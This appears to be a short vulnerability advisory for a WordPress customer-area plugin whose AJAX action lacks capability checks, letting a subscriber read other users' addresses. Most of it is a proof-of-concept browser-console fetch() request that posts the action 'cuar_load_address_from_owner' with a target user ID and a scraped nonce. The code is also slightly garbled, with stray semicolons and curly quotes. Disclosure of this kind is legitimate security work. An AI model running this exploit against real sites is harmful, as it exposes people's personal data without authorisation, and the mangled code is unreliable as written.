Description The plugin does not properly validates user capabilities in some of its AJAX actions, allowing any users to retrieve other user’s account address.
Run the below command in the developer console of the browser when being logged in the blog as a subscriber and on your own edit account page (https://example.com/customer-area/my-account/edit-account/): fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “action=cuar_load_address_from_owner&owner;[type]=usr&owner;[ids][]=ADD_USER_ID&address;_id=home_address&cuar;_nonce=” + document.querySelector(‘div.cuar-home-address input#cuar_nonce’).value, “method”: “POST”, “mode”: “cors”, “credentials”: “include” }).then((response) => {return response.text(); }) .then((data) => { console.log(data); });